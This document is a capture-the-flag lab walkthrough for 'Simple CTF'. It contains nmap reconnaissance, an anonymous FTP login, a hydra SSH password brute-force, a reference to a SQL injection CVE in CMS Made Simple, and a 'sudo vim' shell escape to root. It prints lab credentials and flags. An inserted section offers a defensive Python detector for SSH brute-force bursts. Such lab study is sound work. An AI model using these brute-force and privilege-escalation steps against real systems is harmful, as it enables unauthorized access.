Simple CTF
TARGET IP --> 10.10.120.214
Task 1: How many services are running under port 1000?
Utilize nmap for a quick scan.
nmap [Target IP]

It appears that two services are running: FTP and HTTP.
nmap -sV -sC [Target IP]

Looks like Anonymous login is allowed for FTP and SSH is running on port 2222.
Task 2: What is running on the higher port?
After running a script scan and version scan with nmap I found that port 2222 is running SSH. Check the notes above.
Task 3: What's the CVE you're using against the application?
First tried out the web server on port 80. Looks like the default Apache web server page.

Checking Wappalyzer shows the Apache web server at version 2.4.18 and Ubuntu as the OS.

Next I checked out the robots.txt page that was discovered during the nmap scan.

I found a directory named /openemr-5_0_1_3, and a possible user named mike.
The directory isn't there.
Decided to log into the FTP service with the anonymous account. Browsed around and found a file.
ftp [Target IP]

Use the get command to download the file.
get ForMitch.txt
Cat the file to view it.
cat ForMitch.txt

The system user password is really weak.
Let's do a hydra attack on the SSH server.
hydra -V -l mitch -P rockyou.txt ssh://[Target IP]:2222
It kicked back credentials for Mitch.
mitch:secret

Now let's log into the SSH account with Mitch's credentials:
ssh -p 2222 mitch@[Target IP]
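As an added example (not from the original write-up), here is a small detector a defender could run over sshd auth.log lines to spot the kind of password-guessing burst the hydra run above produces, and the successful login from the same source that follows it. The log lines are constructed sample data; the failure threshold and time window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd auth.log excerpt (sample data, not taken from the write-up).
# It models a password-guessing burst against user "mitch" from one source,
# the eventual successful login from that source, and unrelated benign activity.
SAMPLE_AUTH_LOG = "\n".join(
    [f"Jan 10 12:00:0{i} host sshd[12{i:02d}]: Failed password for mitch from 10.10.10.5 port 510{i:02d} ssh2"
     for i in range(6)]
    + ["Jan 10 12:00:07 host sshd[1206]: Accepted password for mitch from 10.10.10.5 port 51006 ssh2",
       "Jan 10 12:05:00 host sshd[1300]: Accepted publickey for sunbath from 10.10.10.9 port 40000 ssh2",
       "Jan 10 12:06:00 host sshd[1301]: Failed password for invalid user admin from 10.10.10.9 port 40001 ssh2"]
)

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_ts(ts: str, year: int = 2024) -> datetime:
    # syslog timestamps carry no year; assume one so time deltas can be computed
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(log_text: str, threshold: int = 5, window_s: int = 60) -> dict:
    """Return {ip: alert} for sources with >= threshold failed logins inside
    window_s seconds; alert records the peak failure count, the usernames
    tried, and whether an Accepted login from that source followed the burst."""
    recent = defaultdict(deque)  # ip -> timestamps of recent failures
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts = m["ip"], parse_ts(m["ts"])
        if m["result"] == "Failed":
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:  # slide the window
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"failures": 0, "users": set(), "success_after_burst": False})
                a["failures"] = max(a["failures"], len(q))
                a["users"].add(m["user"])
        elif ip in alerts:  # success from a source already flagged: likely a cracked password
            alerts[ip]["success_after_burst"] = True
    return alerts

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, alert)
```

The same parser works on a real /var/log/auth.log; the "success after burst" flag is the line worth paging on, since a burst alone may just be a scanner.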

The answer to this one was actually gaining access to mitch's account through the web server instead of SSH. To do this you can find a login page on the web server by using gobuster.
I actually had to look up another person's write-up to see how they did it.
This will take you to a login page using CMS Made Simple 2.2.8.
Googling vulnerabilities for this application shows that there is one on Exploit DB.
This shows CVE-2019-9053.
You can use this POC to grab a salted/hashed password from the CMS. You can then use hashcat to crack the password for Mitch.

Task 4: To what kind of vulnerability is the application vulnerable?
Checking the Exploit DB entry for the CVE shows this application is susceptible to SQL injection (SQLi).
Task 5: What's the password?
Based on the hydra attack from Task 3, Mitch's password is secret.
Task 6: Where can you log in with the details obtained?
We know we can log into SSH on port 2222 with the credentials.
Task 7: What's the user flag?
Let's cat the file in mitch's home directory.
cat /home/mitch/user.txt
G00d j0b, keep up!

Task 8: Is there any other user in the home directory? What's its name?
Cd out of mitch's directory into the /home directory and we will find another user called sunbath.
Task 9: What can you leverage to spawn a privileged shell?
Once logged in as mitch, check what sudo privileges you have.
sudo -l

This shows that I have root privileges with vim.
Next, I'll go to GTFOBins to find a privilege escalation.

So let's try the command to gain root privileges.
sudo vim -c ':!/bin/sh'
And now you should have root privileges.
Task 10: What's the root flag?
Once you have root access, cat the root.txt file.
cat /root/root.txt
W3ll d0n3. You made it!